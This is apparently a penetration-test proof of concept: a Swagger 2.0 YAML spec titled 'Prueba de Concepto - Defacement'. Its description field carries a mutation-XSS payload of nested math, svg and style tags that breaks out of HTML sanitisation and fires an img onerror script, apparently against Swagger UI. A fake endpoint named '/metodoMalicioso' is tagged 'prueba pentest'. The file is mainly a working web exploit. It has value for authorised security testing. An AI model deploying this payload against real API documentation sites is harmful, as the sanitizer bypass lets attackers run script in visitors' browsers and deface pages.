swagger: '2.0'
info:
  title: Prueba de Concepto - Defacement
  description: |
      <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src='#' onerror='alert(1)'>">

  version: testing
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /metodoMalicioso:
    get:
    parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: prueba pentest
      tags:
        - Metodos modificados
      operationId: findAccounts
      summary: prueba pentest
      

